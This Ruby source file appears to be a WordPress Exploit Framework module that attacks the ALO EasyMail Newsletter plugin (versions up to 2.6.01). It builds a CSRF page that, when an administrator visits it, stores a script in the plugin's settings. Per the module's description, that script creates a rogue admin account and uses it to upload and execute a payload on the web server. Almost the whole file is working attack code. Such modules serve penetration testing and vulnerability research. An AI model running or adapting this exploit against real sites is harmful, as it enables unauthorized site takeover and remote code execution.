# frozen_string_literal: true

class Wpxf::Exploit::AloEasymailCsrfXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StagedReflectedXss

  def initialize
    super

    update_info(
      name: 'ALO EasyMail Newsletter <= 2.6.01 CSRF XSS Shell Upload',
      author: [
        'Mohsen Lotfi', # Discovery and disclosure
        'rastating'     # WPXF module
      ],
      desc: 'This module prepares a payload and link that can be sent '\
            'to an admin user which when visited with a valid session '\
            'will store a script in the ALO EasyMail admin settings page '\
            'which when visited will create a new admin user which will be '\
            'used to upload and execute the selected payload in the context '\
            'of the web server.',
      references: [
        ['WPVDB', '8392'],
        ['EDB', '39451']
      ],
      date: 'Feb 16 2016'
    )
  end

  def check
    check_plugin_version_from_readme('alo-easymail', '2.7')
  end

  def initial_script
    %|<html><head></head><body><script>
      #{js_post}
      post('#{normalize_uri(wordpress_url_admin, 'edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php')}', {
        listname_en: "<script>#{xss_ascii_encoded_include_script}<\\/script>",
        elp_list_available: 'hidden',
        elp_list_order: '0',
        user_ID: '1',
        task: 'save_list',
        list_id: '',
        submit_list: 'Save'
      });
    </script></body></html>
    |
  end
end
